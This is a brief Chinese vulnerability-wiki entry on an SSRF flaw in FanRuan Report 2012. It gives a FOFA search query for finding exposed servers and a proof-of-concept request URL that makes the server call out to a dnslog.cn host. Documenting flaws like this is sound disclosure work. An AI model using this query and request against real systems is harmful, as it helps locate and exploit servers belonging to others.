帆软报表 2012 SSRF漏洞

漏洞描述

帆软报表 2012 存在信息泄露漏洞,通过访问特定的Url获取造成SSRF

漏洞影响

[!NOTE]

帆软报表 2012

FOFA

[!NOTE]

body="down.download?FM_SYS_ID"

漏洞复现

漏洞验证Url为

/ReportServer?op=resource&resource=0m0m6k.dnslog.cn

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:41

results matching ""

    No results matching ""